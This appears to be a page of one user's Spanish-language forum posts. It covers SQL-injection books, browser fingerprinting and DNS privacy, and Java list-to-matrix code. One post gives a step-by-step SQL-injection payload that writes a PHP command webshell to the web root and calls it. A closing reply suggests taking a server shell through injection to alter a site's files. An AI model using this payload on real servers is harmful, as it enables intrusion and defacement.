Mensajes

Hace poco me acabe de leer el libro de "Hacking y seguridad de paginas web" de Mundo Hacker y tiene un capitulo dedicado a SQL Injection y sus variantes.
Primero se se centra en aprender a construir las sentencias sql en base a mensajes de error para luego inyectarlas y conseguir información que no debería ser accesible como por ejemplo, obtener nombres de tablas, bases de datos accesibles, y sus datos correspondientes, después explica las particularidades en Mysql y Oracle aunque no de un modo muy intensivo. También hace hincapié en subir una webshell,BulkInsert, blind sql injection basado en true/false y en retardos de tiempo,
Lo que mola es que te enseña a hacer las cosas a mano dejando las herramientas de lado.

Por otro lado tengo pendiente de leer "SQL Injection Attacks and Defense" que aquí si que profundiza en estas versiones MySQL, Oracle SQL, SQL Server, PostgreSQL y parece muchos más intensivo que el anterior. Lo único es que no puedo opinar al respecto pero cuando lo lea si eso te digo.

Saludos

[FILE]

No hace tener las credenciales del admin para subir tu propio shell.

El primer paso consiste en encontrar un punto de inyección desde donde introducir codigo SQL.

Después debemos comprobar si el usuario que realiza las consultas a la base de datos tiene el permiso de FILE para leer y escribir ficheros en el servidor usando sentencias "SELECT ... INTO OUTFILE".

El tercer paso consiste en encontrar en el servidor algún directorio donde tengas permisos de
escritura, normalmente se suelen buscar ficheros temporales ya que cuentas con estos privilegios.

En el cuarto paso haremos uso de SQL Injection y mediante la técnica UNION escribimos el el fichero especificado código PHP.

Código [Seleccionar] Expandir


http://ejemplo.com/pagina.php?id=1 union select 1,1, "<?ph system($_REQUEST['terminal']); ?>" into outfile "/var/www/html/temp/miFichero.php" --

Aquí por ejemplo el punto de inyección son los parámetros que se pasan por GET pero también podría ser alguna caja de texto cuyo valor se envié a la base de datos y no este correctamente saneado.

El quinto y ultimo paso consiste en acceder a ese fichero que hemos creado mediante la url quedando algo así

Código [Seleccionar] Expandir


http://ejemplo.com/temp/miFichero.php?terminal=comandoQueQuierasEjecutar


En algunos libros y artículos de ciberforensics hay secciones que explican ciertos archivos que usan algunos navegadores y software relacionado para guardar el historial, cookies, cache, configuraciones, residuos de localStorage y demás. Estos permanecen a pesar de que tu los borres explícitmente desde la interfaz que te proporcionan los navegadores. Muchos de ellos teniendo partes del código privativo te puedes imaginar con que objetivo o cuales son los intereses que puedan tener en guardar estos archivos.

Y si por ejemplo tengo instalado un navegador de software privativo como Chrome y otro de software libre como Firefox pero solo uso este ultimo, puede Chrome acceder a toda esa información del otro navegador?
¿Podrías recomendarme algún libro o articulo sobre esa temática? no importa que estén en ingles xD

Por ahí hay bastantes pappers de fingerprinting. También hay otros métodos no legales que no se mencionan pero se usan.

Esta web está bastante bien:
https://browserleaks.com/

Falta mucho fingerprint con CSS, scanneres, vulns, cookies, leaks de DNS, y demás. Tampoco se hace mención a beacons, o software instalado. Hay mucha info por ahí.

Muchas gracias por la info, no conocía esa pagina. He probado varias pruebas que tienen en la pagina y me ha llamado la atención el de TCP/IP stack fingerprinting. La cosa viene que al usar el protocolo ICMP si en el firewall del router lo bloqueo, evitaría ser escaneado y no respondería al ping pero también podría tener problemas a la hora de establecer comunicaciones. ¿En ese caso seria mejor establecer una regla para limitar el trafico que use el protocolo ICMP cuando supere una determinada cantidad de paquetes en un tiempo?

Las DNS son texto plano y van por protocolo sin cifrado. Te quitas las DNS de tu ISP, las de Google y te pones las de OpenNic.
Tu tráfico viaja por tu ISP, tu ISP usa servicios de Google, y acaban en OpenNic. En vez de a 2, a 3.
Lo mismo pasa con los sistemas, el hardware y las webs que visitas. Ahora mismo estás en una web que usa los servicios de Google Analytics. Tienes las cookies GA y en cuanto vayas a otra página saben que has estado aquí sin necesidad de inspeccionar tráfico DNS. Hay burradas de variables para fingerprint. WebGl, HTML5, potencia de hardware, versión navegador, rango IP de ISP, leaks, servicios baneados por tu ISP. Firewall del estado, sound beacons...

Solo que tengo configurado mi navegador para que nada mas cerrarlo me borre todas las cookies almacenadas y ademas alguna que otra extensión como Decentraleyes, UblockOrigin para bloquear las que sean de terceros y que al cerrar la pestaña se limpien. No se si habrá alguna forma mas eficiente de evitar ser rastreado en este aspecto.

La verdad es que en la parte practica de fingerprint soy un poco novato, pero ahora que estoy aprendiendo el manejo de cookies y sesiones en php me gustaría hacer un proyecto que tenga relación a esto.

También encontré un canal que tiene videos sobre privacidad y es bastante interesante, aquí os lo dejo por si queréis echarle un ojo.https://www.youtube.com/watch?v=lLessJ4R6w8

No hace falta que los guarden ellos. La mayoría de sitios te dice: NOSOTROS no guardamos tus datos. Que en ningún momento implica que su cuñado tenga acceso al servidor y sea el quien los guarde.

Al final la única forma de estar seguro de que no guardan datos es usando un servidor de tu propiedad y aun así mi trafico seguiría viajando por mi ISP...Y si montas un servidor DNS propio estas mas expuesto a amenazas externas.

Aun así entiendo lo que dices, normalmente Google escucha todo lo que dices en frente de un móvil para así después modelar la publicidad "a tu gusto". Creo que el tema de reconocimiento se puede desactivar (parcialmente?) en tu cuenta de Google.

Buenas, para desactivar las escuchas por parte de Google puedes quitarle los permisos de acceso al micrófono desde el móvil o instalar un sistema operativo libre y librarte de todas las aplicaciones de Google por defecto. Pero lo que no pueden hacer es falsificar las grabaciones que tienen asignadas a tu cuenta, ya que los usuarios tenemos el derecho de saber todos los datos que se almacenan sobre nosotros. De hecho si entras en tu cuenta de Google hay un apartado donde puedes ver todas las grabaciones que tienen y seria una infracción muy grave si falsifican esa información.

Pero vamos cualquier búsqueda que realices también es trackeada o seguida, yo mismamente utilizo las DNS de Google para todo mi hogar, eso implica que yo y mi familia resolvemos las direcciones IP mediante Google, cosa que a mi no me preocupa.

Solo es curiosidad, pero sabiendo que al usar las DNS de Google guardan todas las paginas que visitas y que al mismo tiempo se están lucrando con esa información a tu costa,¿no te gustaría plantearte otra opción?.

Yo personalmente uso las DNS de OpenNic que son de  carácter publico y la mayoría de los servidores no guardan ese tipo de información. Aunque si nos ponemos paranoicos tampoco podemos comprobar al 100% que no guarden cierta información al utilizar sus DNS. Lo que me da confianza es que cada servidor tiene un documento en el que expone si guarda o no datos y durante cuanto tiempo, y en caso de no cumplirse podrían comerse una buena sanción.

Saludos

Se me ha ocurrido separar en el toString de persona todos los datos  por ";" para luego en la clase Main llamarlo . Asi con el método split puedes sacar todos los datos en la matriz que yo he llamado atributos por cada objeto de la clase Persona y luego los insertas.

Código [Seleccionar] Expandir


       List<Object> amigas = new ArrayList<>();
        P p1= new P("vanessa","navarro","programadora",32);
        P p2 = new P("ana","keldysh","programadora",15);
        amigas.add(p1);
        amigas.add(p2);
        int filas = amigas.size();       
        Object amigasMatriz[][] = new Object[filas][4];
        int filaMatriz = 0;     
        for (Object amiga : amigas)
        {           
            if(amiga instanceof P)
            {
                String nombre = ((P) amiga).getNombre();
                String apellido = ((P) amiga).getApellido();
                int edad = ((P) amiga).getEdad();
                String profesion = ((P) amiga).getProfesion();
                String[] atributos = amiga.toString().split(";");
                for(int i = 0 ; i < atributos.length ; i++)
                {
                    amigasMatriz[filaMatriz][i] = atributos[i];
                }
                filaMatriz++;
            }           
        }
        for(int i = 0 ; i < amigasMatriz.length ; i++)
        {
            for(int j = 0 ; j < amigasMatriz[i].length ; j++)
            {               
                System.out.print(amigasMatriz[i][j]+" ");               
            }
            System.out.println("");
        }


Y el toString de la clase P

Código [Seleccionar] Expandir


   @Override
    public String toString()
    {
        return nombre+";"+apellido+";"+profesion+";"+edad;
    }


Otra opción seria  comprobar si el fichero existe o no y en caso de que no exista lo creas, así no tienes que estar pendiente de si esta creado.

Código [Seleccionar] Expandir


        File fichero = new File("fichero.xls");
        if(!fichero.exists())
        {
            try
            {
                fichero.createNewFile();
            }
            catch (IOException ex)
            {
                System.out.println(ex.getMessage());
            }
        }


Solo tienes que sacar los datos de la lista y añadirlos en el indice correspondiente de la matriz.Yo lo he hecho un poco caótico porque he puesto las columnas de la matriz "amigasMatriz" a mano y si a la clase "P" la metes mas atributos no se añadirán, a un rato lo intento hacer y lo comento.
También me parece curioso que quieras pasar datos de una lista a una matriz, personalmente me siento más cómodo trabajando con listas pero para gustos los colores  .
Te adjunto el código.

Código [Seleccionar] Expandir


      List<Object> amigas = new ArrayList<>();
        P p1= new P("vanessa","navarro","programadora",32);
        P p2 = new P("ana","keldysh","programadora",15);
        amigas.add(p1);
        amigas.add(p2);
        int filas = amigas.size();       
        Object amigasMatriz[][] = new Object[filas][4];
        int filaMatriz = 0;       
        for (Object amiga : amigas)
        {           
            if(amiga instanceof P)
            {
                String nombre = ((P) amiga).getNombre();
                String apellido = ((P) amiga).getApellido();
                int edad = ((P) amiga).getEdad();
                String profesion = ((P) amiga).getProfesion();
                amigasMatriz[filaMatriz][0] = nombre;
                amigasMatriz[filaMatriz][1] = apellido;
                amigasMatriz[filaMatriz][2] = edad;
                amigasMatriz[filaMatriz][3] = profesion;               
                filaMatriz++;
            }           
        }
        for(int i = 0 ; i < amigasMatriz.length ; i++)
        {
            for(int j = 0 ; j < amigasMatriz[i].length ; j++)
            {               
                System.out.print(amigasMatriz[i][j]+" ");               
            }
            System.out.println("");
        }


Saludos

A la hora de añadir objectos a la lista solo tienes que pasarle un objecto de tipo Persona por ejemplo

Código [Seleccionar] Expandir


Persona persona = new Persona(...);
lista.add(persona);


Buenas, en ese caso tienes que conseguir una shell del servidor y después acceder al directorio donde se guardan los ficheros que se van a mostrar, en Linux suele ser "/var/www/html", y modificarlos.Con sql injection puedes hacerte con una webshell para ese propósito.Te recomiendo que leas sobre esa vulnerabilidad.
Saludos